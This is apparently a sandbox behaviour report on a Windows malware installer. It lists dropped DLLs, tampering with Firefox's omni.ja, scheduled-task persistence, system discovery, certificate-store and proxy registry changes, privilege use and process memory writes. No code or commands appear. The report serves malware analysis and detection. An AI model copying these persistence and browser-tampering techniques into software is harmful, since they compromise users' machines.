File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\bVkZNoO.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\TVYoBqc.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\WNgxMz.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\iUmKyhU.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1541411d-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1541411d-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4728 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe
PID 4728 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe
PID 4728 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe
PID 2632 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe
PID 2632 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe
PID 2632 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe
PID 1620 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
